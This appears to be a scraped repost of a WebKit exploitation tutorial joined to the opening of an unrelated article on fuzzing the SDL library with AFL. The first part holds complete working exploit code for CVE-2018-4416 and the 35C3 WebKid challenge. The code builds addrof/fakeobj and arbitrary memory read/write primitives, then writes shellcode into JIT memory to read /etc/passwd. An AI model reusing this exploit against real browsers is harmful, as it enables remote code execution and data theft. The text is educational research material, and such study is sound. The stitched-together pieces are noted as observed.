writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. 
write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; // Testing code, not related to exploit var plainObj = {}; var header = memory.read64(addrof(plainObj)); memory.writeInt64(memory.addrof(container), header); memory.test(); print("[+] limited memory read/write working"); // get targetd function var func = makeJITCompiledFunction(); var funcAddr = memory.addrof(func); // change the JIT code to shellcode // offset addjustment is a little bit complicated here :P print(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); print(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); print(`[+] JITCode instance @ ${jitCodeObjAddr}`); // var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); // offset for debug builds // final JIT Code address var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); print(`[+] JITCode @ ${jitCodeAddr}`); var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); shellcode.push(...strData.bytes()); // write shellcode memory.write(jitCodeAddr, shellcode); // trigger shellcode 
    var res = func();
    var flag = s.split('\n')[0];
    if (typeof(alert) !== 'undefined')
        alert(flag);
    print(flag);
}

if (typeof(window) === 'undefined')
    pwn();

Conclusion on the Exploitation

To conclude, the exploit uses the two most important attack primitives - addrof and fakeobj - to leak addresses and craft fake objects. The address of a JITed function is leaked and its code is overwritten with our shellcode array. Then we call the function to leak the flag. Almost all browser exploits follow this form. Thanks to the 35C3 CTF organizers, especially Saelo. It's a great challenge for learning WebKit type confusion.

Debugging WebKit

Now we have covered all the theory: architecture, object model, exploitation. Let's get some hands-on practice. To prepare, use the compiled JSC from the Setup part. Just use the latest version, since we only discuss debugging here. I used to set breakpoints just to find object addresses, but that is actually a poor approach. JSC has many non-standard functions that can dump information for us (you cannot use most of them in Safari!):

print() and debug(): Like console.log() in node.js, they output information to our terminal. However, print in Safari will use a real-world printer to print documents.
describe(): Describe one object. We can get the address, class members, and related information via this function.
describeArray(): Similar to describe(), but it focuses on the array information of an object.
readFile(): Open a file and get its content.
noDFG() and noFTL(): Disable some JIT compilers.

Setting Breakpoints

The easiest way to set a breakpoint is to break on an otherwise unused function, something like print or Array.prototype.slice([]);. Since most of the time we do not know whether a function will affect a PoC, this method might have side effects. Setting breakpoints on the vulnerable functions also works. When you try to understand a vulnerability, breaking on them is extremely important, but their call stacks may not be pleasant. We can also add a custom debugging function (using int 3) to the WebKit source code.
Define, implement, and register the function in /Source/JavaScriptCore/jsc.cpp. It lets us stop WebKit inside the debugger:

static EncodedJSValue JSC_HOST_CALL functionDbg(ExecState*);

addFunction(vm, "dbg", functionDbg, 0);

static EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec)
{
    asm("int3");
    return JSValue::encode(jsUndefined());
}

Since the third method requires us to modify the source code, I personally prefer the previous two.

Inspecting JSC Objects

Okay, we use this script:

arr = [0, 1, 2, 3]
debug(describe(arr))
print()

Use gdb with gef to debug; as you may have guessed, we will break on print():

gdb jsc
gef> b *printInternal
gef> r
--> Object: 0x7fffaf4b4350 with butterfly 0x7ff8000e0010 (Structure 0x7fffaf4f2b50:[Array, {}, CopyOnWriteArrayWithInt32, Proto:0x7fffaf4c80a0, Leaf]), StructureID: 100
... // Some backtrace

The object address and butterfly pointer might vary on your machine. If we edit the script, the addresses may also change. Please adjust them based on your output. Let's take a first look at the object and its butterfly:

gef> x/2gx 0x7fffaf4b4350
0x7fffaf4b4350: 0x0108211500000064 0x00007ff8000e0010
gef> x/4gx 0x00007ff8000e0010
0x7ff8000e0010: 0xffff000000000000 0xffff000000000001
0x7ff8000e0020: 0xffff000000000002 0xffff000000000003

What if we change it to float?

arr = [1.0, 1.0, 2261634.5098039214, 2261634.5098039214]
debug(describe(arr))
print()

We use a small trick here: 2261634.5098039214 is represented as 0x4141414141414141 in memory. Finding a value is much handier with such a magic number (we use the butterfly pointer directly here).
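The magic-number trick can be checked outside the debugger. The following is a small sketch that converts between a double and its raw 64-bit pattern; the helper names doubleFromBits and bitsOfDouble are hypothetical, and the code assumes a modern engine with BigInt typed arrays (for example a recent Node.js), not the old jsc build being debugged.

```javascript
// Hypothetical helpers for illustration only.

// Build the double whose raw IEEE-754 bits equal the given 64-bit pattern.
function doubleFromBits(bits) {
    var u64 = new BigUint64Array(1);
    u64[0] = bits;
    // Reinterpret the same 8 bytes as a double.
    return new Float64Array(u64.buffer)[0];
}

// Return the raw 64-bit pattern of a double as a BigInt.
function bitsOfDouble(d) {
    var f64 = new Float64Array(1);
    f64[0] = d;
    return new BigUint64Array(f64.buffer)[0];
}

var marker = doubleFromBits(0x4141414141414141n);
var markerHex = "0x" + bitsOfDouble(2261634.5098039214).toString(16);
var oneHex = "0x" + bitsOfDouble(1.0).toString(16);
```

Any recognizable pattern can be turned into a marker double this way, as long as the pattern does not encode a NaN.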
By default, JSC fills unused memory with 0x00000000badbeef0:

gef> x/10gx 0x00007ff8000e0010
0x7ff8000e0010: 0x3ff0000000000000 0x3ff0000000000000
0x7ff8000e0020: 0x4141414141414141 0x4141414141414141
0x7ff8000e0030: 0x00000000badbeef0 0x00000000badbeef0
0x7ff8000e0040: 0x00000000badbeef0 0x00000000badbeef0
0x7ff8000e0050: 0x00000000badbeef0 0x00000000badbeef0

The memory layout is the same as described in the JSC Object Model part, so we won't repeat it here.

Getting Native Code

Now it's time to get a compiled function. It plays an important role both in understanding the JSC compilers and in exploitation:

const ITERATIONS = 100000;

function jitCompile(f, ...args) {
    for (var i = 0; i < ITERATIONS; i++) {
        f(...args);
    }
}
jitCompile(function dummy() { return 42; });
debug("jitCompile Ready")

function makeJITCompiledFunction() {
    function target(num) {
        for (var i = 2; i < num; i++) {
            if (num % i === 0) {
                return false;
            }
        }
        return true;
    }
    jitCompile(target, 123);
    return target;
}

func = makeJITCompiledFunction()
debug(describe(func))
print()

This is not hard if you read the previous section carefully. Now we follow the pointers to the native code in the debugger:

--> Object: 0x7fffaf468120 with butterfly (nil) (Structure 0x7fffaf4f1b20:[Function, {}, NonArray, Proto:0x7fffaf4d0000, Leaf]), StructureID: 63
... // Some backtrace ...
gef> x/gx 0x7fffaf468120+24
0x7fffaf468138: 0x00007fffaf4fd080
gef> x/gx 0x00007fffaf4fd080+24
0x7fffaf4fd098: 0x00007fffefe46000
// In debug mode, it's okay to use 368 as offset
// In release mode, however, it should be 352
gef> x/gx 0x00007fffefe46000+368
0x7fffefe46170: 0x00007fffafe02a00
gef> hexdump byte 0x00007fffafe02a00
0x00007fffafe02a00 55 48 89 e5 48 8d 65 d0 48 b8 60 0c 45 af ff 7f UH..H.e.H.`.E...
0x00007fffafe02a10 00 00 48 89 45 10 48 8d 45 b0 49 bb b8 2e c1 af ..H.E.H.E.I.....
0x00007fffafe02a20 ff 7f 00 00 49 39 03 0f 87 9c 00 00 00 48 8b 4d ....I9.......H.M
0x00007fffafe02a30 30 48 b8 00 00 00 00 00 00 ff ff 48 39 c1 0f 82 0H.........H9...
Feed the dumped bytes to rasm2:

rasm2 -d "your dumped bytes here"
push ebp
dec eax
mov ebp, esp
dec eax
lea esp, [ebp - 0x30]
dec eax
mov eax, 0xaf450c60
invalid
jg 0x11
add byte [eax - 0x77], cl
inc ebp
adc byte [eax - 0x73], cl
inc ebp
mov al, 0x49
mov ebx, 0xafc12eb8
invalid
jg 0x23
add byte [ecx + 0x39], cl
add ecx, dword [edi]
xchg dword [eax + eax - 0x74b80000], ebx
dec ebp
xor byte [eax - 0x48], cl
add byte [eax], al
add byte [eax], al
add byte [eax], al
invalid
dec dword [eax + 0x39]
ror dword [edi], 0x82

Emmmm... the disassembly is partially incorrect. The bytes were decoded as 32-bit x86, so every 0x48 REX prefix shows up as a stray dec eax; asking rasm2 for 64-bit mode (rasm2 -a x86 -b 64 -d ...) should give a cleaner listing. At least we can see a rough draft now.

1 Day Exploitation

Let's use the bug from the triggering-bug section: CVE-2018-4416. It's a type confusion. Since we already talked about WebKid, a similar CTF challenge that has a type confusion bug, it won't be difficult to understand this one. Switch to the vulnerable branch and start our journey. The PoC is provided at the beginning of the article. Copy int64.js, shellcode.js, and utils.js from the WebKid repo to your virtual machine.

Root Cause

Quotation from Lokihardt

The following is the description of CVE-2018-4416 from Lokihardt, with my partial highlight.

When a for-in loop is executed, a JSPropertyNameEnumerator object is created at the beginning and used to store the information of the input object to the for-in loop. Inside the loop, the structure ID of the "this" object of every get_by_id expression taking the loop variable as the index is compared to the cached structure ID from the JSPropertyNameEnumerator object. If it's the same, the "this" object of the get_by_id expression will be considered having the same structure as the input object to the for-in loop has. The problem is, it doesn't have anything to prevent the structure from which the cached structure ID from being freed. As structure IDs can be reused after their owners get freed, this can lead to type confusion.

Line by Line Explanation

Comments in /* */ are my analysis, which might be inaccurate.
Comment after // is by Lokihardt: function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } /* Step 3 */ /* This is abother target */ /* We want to confuse it(tmp) with obj(fake_object_memory) */ let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. /* Step 4 */ /* Change the structure of tmp to {} */ tmp.__proto__ = {}; gc(); /* The structure of obj is also {} now */ obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. /* Step 5 */ /* Compiler believes obj and tmp share the same type now */ /* Thus, obj[k] will retrieve data from object with offset a */ /* In the patched version, it should be undefined */ return obj[k]; // Type confusion. } } /* Step 0 */ /* Prepare structure {} */ opt({}); /* Step 1 */ /* Target Array, 0x1234 is our fake address*/ let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x1234; /* Step 2 */ /* Trigger type confusion*/ let fake_object = opt(fake_object_memory); /* JSC crashed */ print(fake_object); Debugging Let’s debug it to verify our thought. I modify the original PoC for easier debugging. But they are almost identical except additional print(): function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } function opt(obj) { // Starting the optimization. for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator. tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's. debug("Confused Object: " + describe(obj)); return obj[k]; // Type confusion. 
    }
}

opt({});

let fake_object_memory = new Uint32Array(100);
fake_object_memory[0] = 0x41424344;
let fake_object = opt(fake_object_memory);
print()
print(fake_object)

Then run gdb ./jsc, b *printInternal, and r poc.js. We get:

...
--> Confused Object: Object: 0x7fffaf6b0080 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Object, {}, NonArray, Proto:0x7fffaf6b3e80, Leaf]), StructureID: 142
--> Confused Object: Object: 0x7fffaf6cbe40 with butterfly (nil) (Structure 0x7fffaf6f3db0:[Uint32Array, {}, NonArray, Proto:0x7fffaf6b3e00, Leaf]), StructureID: 142
...

Let's take a look at our fake address. JSC is too large to find your dream breakpoint easily, so let's set a watchpoint to track the flow instead:

gef> x/4gx 0x7fffaf6cbe40
0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000
0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064
gef> x/4gx 0x00007fe8014fc000
0x7fe8014fc000: 0x0000000041424344 0x0000000000000000
0x7fe8014fc010: 0x0000000000000000 0x0000000000000000
gef> rwatch *0x7fe8014fc000
Hardware read watchpoint 2: *0x7fe8014fc000

We get the expected output later:

Thread 1 "jsc" hit Hardware read watchpoint 2: *0x7fe8014fc000
Value = 0x41424344
0x00005555555bebd4 in JSC::JSCell::structureID (this=0x7fe8014fc000) at ../../Source/JavaScriptCore/runtime/JSCell.h:133
133 StructureID structureID() const { return m_structureID; }

But why does it show up as the structure ID? We can get the answer from the memory layouts:

obj (fake_object_memory):
0x7fffaf6cbe40: 0x02082a000000008e 0x0000000000000000
0x7fffaf6cbe50: 0x00007fe8014fc000 0x0000000000000064

tmp ({a: 1}):
0x7fffaf6cbdc0: 0x000016000000008b 0x0000000000000000
0x7fffaf6cbdd0: 0xffff000000000001 0x0000000000000000

The third 8-byte slot of tmp holds property a, while the same slot of the Uint32Array holds its data pointer. So the data pointer of the Uint32Array is returned as if it were an object. And m_structureID is at the beginning of every JS object. Since 0x41424344 (0x1234 in the original PoC) is the first element of our array, it's reasonable for structureID() to retrieve it. We can now use the data in the Uint32Array to craft a fake object. Awesome!
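The relationship between the dumped header words and the structure IDs can be verified with a few lines of script. This is only a sketch for a modern engine with BigInt support; structureIdOf is a hypothetical helper, and it assumes (consistent with the dumps above) that the structure ID occupies the low 32 bits of the first 8-byte word.

```javascript
// Hypothetical helper for illustration only.
// Assumption: the structure ID is the low 32 bits of the first header word.
function structureIdOf(headerWord) {
    return Number(headerWord & 0xffffffffn);
}

// First words copied from the gdb dumps above.
var objHeader = 0x02082a000000008en; // the Uint32Array
var tmpHeader = 0x000016000000008bn; // tmp = {a: 1}

var objId = structureIdOf(objHeader);
var tmpId = structureIdOf(tmpHeader);

// Reading the start of the typed array's backing store as a header word
// (little-endian host assumed) yields the value we stored in element 0.
var fake = new Uint32Array(100);
fake[0] = 0x41424344;
var firstWord = new BigUint64Array(fake.buffer)[0];
var fakeId = structureIdOf(firstWord);
```

Here objId comes out as 142, matching the StructureID printed by describe(), and fakeId is exactly the 0x41424344 reported by the watchpoint.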
Constructing Attack Primitive

addrof

Now we should craft a legal object. I choose {} (an empty object) as our target. What does an empty object look like in memory (ignoring scripting and debugging here)?

0x7fe8014fc000: 0x010016000000008a 0x0000000000000000

Okay, it begins with 0x010016000000008a. We can easily simulate it in the Uint32Array (remember to paste gc and opt here):

function gc() {
    ... // Same as above
}

function opt(obj) {
    ... // Same as above
}

opt({});

let fake_object_memory = new Uint32Array(100);
fake_object_memory[0] = 0x0000004c;
fake_object_memory[1] = 0x01001600;
let fake_object = opt(fake_object_memory);
fake_object.a = {}
print(fake_object_memory[4])
print(fake_object_memory[5])

Two mysterious numbers are returned:

2591768192 # hex: 0x9a7b3e80
32731 # hex: 0x7fdb

Obviously, together they form a pointer (0x7fdb9a7b3e80). We can leak the address of an arbitrary object now!

fakeobj

Getting fakeobj is almost identical to crafting addrof. The difference is that you write an address into the Uint32Array first, then get the object via attribute a of fake_object.

Arbitrary R/W and Shellcode Execution

It's similar to the exploit script in the WebKid challenge. The full script is too long to explain line by line. You can, however, find it here. You may need to try around 10 rounds to exploit successfully. It will read your /etc/passwd when it succeeds.
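Both primitives boil down to converting between one 64-bit address and two 32-bit array elements. The sketch below shows that conversion with the numbers leaked in the addrof step; joinHalves and splitAddress are hypothetical helpers, and the code uses BigInt, so it is meant for checking values in a modern engine rather than for the vulnerable jsc build.

```javascript
// Hypothetical helpers for illustration only.

// Combine the low and high 32-bit halves into one 64-bit address.
function joinHalves(low, high) {
    return (BigInt(high) << 32n) | BigInt(low);
}

// Split a 64-bit address into [low, high] halves, ready to be stored
// in two consecutive Uint32Array elements (little-endian layout).
function splitAddress(addr) {
    return [Number(addr & 0xffffffffn), Number(addr >> 32n)];
}

// Values printed from fake_object_memory[4] and fake_object_memory[5].
var leaked = joinHalves(2591768192, 32731);
var leakedHex = "0x" + leaked.toString(16);
var halves = splitAddress(leaked);
```

An exploit that has to run without BigInt can do the same job with hex strings, zero-padding each half to eight digits before concatenating or slicing.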
Here is the core code: // get compiled function var func = makeJITCompiledFunction(); function gc() { for (let i = 0; i < 10; i++) { let ab = new ArrayBuffer(1024 * 1024 * 10); } } // Typr confusion here function opt(obj) { for (let i = 0; i < 500; i++) { } let tmp = {a: 1}; gc(); tmp.__proto__ = {}; for (let k in tmp) { tmp.__proto__ = {}; gc(); obj.__proto__ = {}; // Compiler are misleaded that obj and tmp shared same type return obj[k]; } } opt({}); // Use Uint32Array to craft a controable memory // Craft a fake object header let fake_object_memory = new Uint32Array(100); fake_object_memory[0] = 0x0000004c; fake_object_memory[1] = 0x01001600; let fake_object = opt(fake_object_memory); debug(describe(fake_object)) // Use JIT to stablized our attribute // Attribute a will be used by addrof/fakeobj // Attrubute b will be used by arbitrary read/write for (i = 0; i < 0x1000; i ++) { fake_object.a = {test : 1}; fake_object.b = {test : 1}; } // get addrof // we pass a pbject to fake_object // since fake_object is inside fake_object_memory and represneted as integer // we can use fake_object_memory to retrieve the integer value function setup_addrof() { function p32(num) { value = num.toString(16) return "0".repeat(8 - value.length) + value } return function(obj) { fake_object.a = obj value = "" value = "0x" + p32(fake_object_memory[5]) + "" + p32(fake_object_memory[4]) return new Int64(value) } } // Same // But we pass integer value first. 
then retrieve object function setup_fakeobj() { return function(addr) { //fake_object_memory[4] = addr[0] //fake_object_memory[5] = addr[1] value = addr.toString().replace("0x", "") fake_object_memory[4] = parseInt(value.slice(8, 16), 16) fake_object_memory[5] = parseInt(value.slice(0, 8), 16) return fake_object.a } } addrof = setup_addrof() fakeobj = setup_fakeobj() debug("[+] set up addrof/fakeobj") var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); debug('[+] exploit primitives working'); // Use fake_object + 0x40 cradt another fake object for read/write var container_addr = Add(addrof(fake_object), 0x40) fake_object_memory[16] = 0x00001000; fake_object_memory[17] = 0x01082007; var structs = [] for (var i = 0; i < 0x1000; ++i) { var a = [13.37]; a.pointer = 1234; a['prop' + i] = 13.37; structs.push(a); } // We will use victim as the butterfly pointer of contianer object victim = structs[0x800] victim_addr = addrof(victim) victim_addr_hex = victim_addr.toString().replace("0x", "") fake_object_memory[19] = parseInt(victim_addr_hex.slice(0, 8), 16) fake_object_memory[18] = parseInt(victim_addr_hex.slice(8, 16), 16) // Overwrite container to fake_object.b container_addr_hex = container_addr.toString().replace("0x", "") fake_object_memory[7] = parseInt(container_addr_hex.slice(0, 8), 16) fake_object_memory[6] = parseInt(container_addr_hex.slice(8, 16), 16) var hax = fake_object.b var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. // we change the butterfly of victim to addr + 0x10 // when victim change the pointer attribute, it will read butterfly - 0x10 // which equal to addr + 0x10 - 0x10 = addr // read arbiutrary value is almost the same writeInt64(addr, int64) { hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = int64.asJSValue(); }, // Write a 2 byte integer to the given address. Corrupts 6 additional bytes after the written integer. 
write16(addr, value) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); victim.pointer = value; }, // Write a number of bytes to the given address. Corrupts 6 additional bytes after the end. write(addr, data) { while (data.length % 4 != 0) data.push(0); var bytes = new Uint8Array(data); var ints = new Uint16Array(bytes.buffer); for (var i = 0; i < ints.length; i++) this.write16(Add(addr, 2 * i), ints[i]); }, // Read a 64 bit value. Only works for bit patterns that don't represent NaN. read64(addr) { // Set butterfly of victim object and dereference. hax[1] = Add(addr, 0x10).asDouble(); return this.addrof(victim.pointer); }, // Verify that memory read and write primitives work. test() { var v = {}; var obj = {p: v}; var addr = this.addrof(obj); assert(this.fakeobj(addr).p == v, "addrof and/or fakeobj does not work"); var propertyAddr = Add(addr, 0x10); var value = this.read64(propertyAddr); assert(value.asDouble() == addrof(v).asDouble(), "read64 does not work"); this.write16(propertyAddr, 0x1337); assert(obj.p == 0x1337, "write16 does not work"); }, }; memory.test(); debug("[+] limited memory read/write working"); // Get JIT code address debug(describe(func)) var funcAddr = memory.addrof(func); debug(`[+] shellcode function object @ ${funcAddr}`); var executableAddr = memory.read64(Add(funcAddr, 24)); debug(`[+] executable instance @ ${executableAddr}`); var jitCodeObjAddr = memory.read64(Add(executableAddr, 24)); debug(`[+] JITCode instance @ ${jitCodeObjAddr}`); var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 368)); //var jitCodeAddr = memory.read64(Add(jitCodeObjAddr, 352)); debug(`[+] JITCode @ ${jitCodeAddr}`); // Our shellcode var shellcode = [0xeb, 0x3f, 0x5f, 0x80, 0x77, 0xb, 0x41, 0x48, 0x31, 0xc0, 0x4, 0x2, 0x48, 0x31, 0xf6, 0xf, 0x5, 0x66, 0x81, 0xec, 0xff, 0xf, 0x48, 0x8d, 0x34, 0x24, 0x48, 0x89, 0xc7, 0x48, 0x31, 0xd2, 0x66, 0xba, 0xff, 0xf, 0x48, 0x31, 0xc0, 0xf, 0x5, 0x48, 0x31, 0xff, 0x40, 0x80, 0xc7, 0x1, 
0x48, 0x89, 0xc2, 0x48, 0x31, 0xc0, 0x4, 0x1, 0xf, 0x5, 0x48, 0x31, 0xc0, 0x4, 0x3c, 0xf, 0x5, 0xe8, 0xbc, 0xff, 0xff, 0xff, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x41] var s = "A".repeat(64); var strAddr = addrof(s); var strData = Add(memory.read64(Add(strAddr, 16)), 20); // write shellcode shellcode.push(...strData.bytes()); memory.write(jitCodeAddr, shellcode); // trigger and get /etc/passwd func(); print() Acknowledgement Thanks to Sakura0 who guides me from the sketch. Otherwise, this post will come out much slower. I will also acknowledge all the authors in the reference list. Your share encourages the whole info-sec community! References Groß S, 2018, Black Hat USA, “Attacking Client-Side JIT Compilers” Han C, “js-vuln-db” Gianni A and Heel1an S, “Exploit WebKit Heap” Filip Pizlo, http://www.filpizlo.com, Thanks for many presentations! Groß S, 2018, 35C3 CTF WebKid Challenge dwfault, 2018, WebKit Debugging Skills Tags: WebKit Categories: Tutorial Updated: December 05, 2018 Sursa: https://www.auxy.xyz/tutorial/Webkit-Exp-Tutorial/#acknowledgement
How to Use Fuzzing in Security Research

February 12, 2019 by Radu-Emanuel Chiscariu

Introduction

Fuzzing is one of the most widely used methods for automatic software testing. Through fuzzing, one can generate a large number of possible inputs for an application, according to a set of rules, and inject them into a program to observe how the application behaves. In the security realm, fuzzing is regarded as an effective way to identify corner-case bugs and vulnerabilities. There is a plethora of fuzzing frameworks, both open-source and commercial. There are two major classes of fuzzing techniques:

Evolutionary-based fuzzing: These fuzzers employ genetic algorithms to increase code coverage. They modify the supplied test cases with the purpose of reaching further into the analyzed application. Naturally, this requires some form of code instrumentation to supply feedback to the mutation engine. Evolutionary-based fuzzers are, in general, oblivious to the required input format, sort of 'learning' it along the way. This technique is well supported and maintained in the open-source community. State-of-the-art tools include American Fuzzy Lop (AFL), libFuzzer, and honggfuzz.

Generational-based fuzzing: As opposed to evolutionary-based fuzzers, these build an input based on some specifications and/or formats that provide context-awareness. State-of-the-art commercial tools include Defensics and PeachFuzzer, and open source tools include Peach, Spike, and Sulley.

This classification is not mutually exclusive, but more of a general design distinction. There are tools that include both techniques, such as PeachFuzzer. Here at the Application and Threat Intelligence (ATI) Research Center, one of our objectives is to identify vulnerabilities in applications and help developers fix them before they are exploited. This is done by connecting different applications and libraries to our fuzzing framework.
This article will show how we use fuzzing in our security research by highlighting some of our findings while investigating an open-source library.

Fuzzing the SDL Library

The Simple DirectMedia Layer (SDL) is a cross-platform library that provides an API for implementing multimedia software, such as games and emulators. Written in C, it is actively maintained and employed by the community.

Choosing a Fuzzing Framework

We are going to fuzz SDL using the well-known AFL. Written by lcamtuf, AFL uses runtime-guided techniques, compile-time instrumentation, and genetic algorithms to create mutated input for the tested application. It has an impressive trophy case of identified vulnerabilities, which is why it is considered one of the best fuzzing frameworks out there. Some researchers studied AFL in detail and came up with extensions that modify the behavior of certain components, for example the mutation strategy or the importance attributed to different code branches. Such projects gave rise to FairFuzz, AFL-GO, afl-unicorn, AFLSmart, and python-AFL. We are going to use AFLFast, a project that implemented some fuzzing strategies to target not only high-frequency code paths, but also low-frequency paths, “to stress significantly more program behavior in the same amount of time.” In short, during our research, we observed that for certain fuzzing campaigns, this optimization produces roughly a 2x speedup and better overall code coverage compared to vanilla AFL.

Fuzzing Preparation

To use AFL, you must compile the library’s sources with AFL’s compiler wrappers. Note that there must be no space between a variable name and the equals sign.

$ ./configure CC=afl-clang-fast \
    CFLAGS="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address" \
    LDFLAGS="-O2 -D_FORTIFY_SOURCE=0 -fsanitize=address"
$ make; sudo make install

As observed, we will use both the AFL instrumentation and the ASAN (Address Sanitizer) compiler tool, used to identify memory-related errors.
As specified here, ASAN adds a 2x slowdown to execution speed to the instrumented program, but the gain is much higher, allowing us to possibly detect memory-related issues such as: Use-after-free (dangling pointer dereference) Heap buffer overflow Stack buffer overflow Global buffer overflow Use after return Use after scope Initialization order bugs Memory leaks Furthermore, to optimize the fuzzing process, we compile the sources with: -D_FORTIFY_SOURCE=0 (ASAN doesn't support source fortification, so disable it to avoid false warnings) -O2 (Turns on all optimization flags specified by -O ; for LLVM 3.6, -O1 is the default setting) Let’s check if the settings were applied successfully: $ checksec /usr/local/lib/libSDL-1.2.so.0 [*] '/usr/local/lib/libSDL-1.2.so.0' Arch: amd64-64-little RELRO: No RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled ASAN: Enabled Checksec is a nice tool that allows users to inspect binaries for security options, such as whether the binary is built with a non-executable stack (NX), or with relocation table as read-only (RELRO). It also checks whether the binary is built with ASAN instrumentation, which is what we need. It is part of the pwntools Python package. As observed, the binaries were compiled with ASAN instrumentation enabled as we wanted. Now let’s proceed to fuzzing! Writing a Test Harness An AFL fuzzing operation consists of three primary steps: Fork a new process Feed it an input modified by the mutation engine Monitor the code coverage by keeping a track of which paths are reached using this input, informing you if any crashes or hangs occurred This is done automatically by AFL, which makes it ideal for fuzzing binaries that accept input as an argument, then parse it. But to fuzz the library, we must first make a test harness and compile it. In our case, a harness is simply a C program that makes use of certain methods from a library, allowing you to indirectly fuzz it. 
    #include <stdio.h>   /* fprintf */
    #include <stdlib.h>  /* exit */
    #include "SDL_config.h"
    #include "SDL.h"

    struct {
        SDL_AudioSpec spec;
        Uint8 *sound;     /* Pointer to wave data */
        Uint32 soundlen;  /* Length of wave data */
        int soundpos;     /* Current play position */
    } wave;

    /* Call this instead of exit(), to clean up SDL. */
    static void quit(int rc){
        SDL_Quit();
        exit(rc);
    }

    int main(int argc, char *argv[]){
        /* Load the SDL library */
        if ( SDL_Init(SDL_INIT_AUDIO) < 0 ) {
            fprintf(stderr, "[-] Couldn't initialize SDL: %s\n", SDL_GetError());
            return(1);
        }
        /* Bail out instead of passing a NULL path to SDL_LoadWAV */
        if ( argc < 2 || argv[1] == NULL ) {
            fprintf(stderr, "[-] No input supplied.\n");
            quit(1);
        }
        /* Load the wave file */
        if ( SDL_LoadWAV(argv[1], &wave.spec, &wave.sound, &wave.soundlen) == NULL ) {
            fprintf(stderr, "Couldn't load %s: %s\n", argv[1], SDL_GetError());
            quit(1);
        }
        /* Free up the memory */
        SDL_FreeWAV(wave.sound);
        SDL_Quit();
        return(0);
    }

Our intention here is to initialize the SDL environment, then fuzz the SDL_LoadWAV function from the SDL audio module. To do that, we will supply a sample WAV file, which AFL will tamper with using its mutation engine to go as far into the library code as possible. Introducing some new fuzzing terminology, this file represents our initial seed, which will be placed in the corpus_wave folder.
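If no small sample is at hand, a seed can be generated rather than borrowed. The sketch below uses Python's standard wave module to write a very small, valid PCM file; the function name write_seed_wav, the file name seed.wav and the audio parameters are assumptions chosen for illustration, not something taken from the original campaign.

```python
import os
import wave


def write_seed_wav(path: str, frames: int = 8) -> int:
    """Write a tiny mono, 8-bit, 8 kHz PCM WAV file and return its size in bytes."""
    with wave.open(path, "wb") as wav:
        wav.setnchannels(1)      # mono
        wav.setsampwidth(1)      # 8-bit samples
        wav.setframerate(8000)   # 8 kHz
        wav.writeframes(b"\x80" * frames)  # 0x80 is silence for unsigned 8-bit PCM
    return os.path.getsize(path)


if __name__ == "__main__":
    # corpus_wave is the seed folder named in the text; seed.wav is a made-up name
    os.makedirs("corpus_wave", exist_ok=True)
    size = write_seed_wav(os.path.join("corpus_wave", "seed.wav"))
    print(f"wrote {size} bytes")
```

A seed this small only exercises the plain PCM path, so it trades initial coverage for execution speed; adding a few more small files in other encodings would be a reasonable complement.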
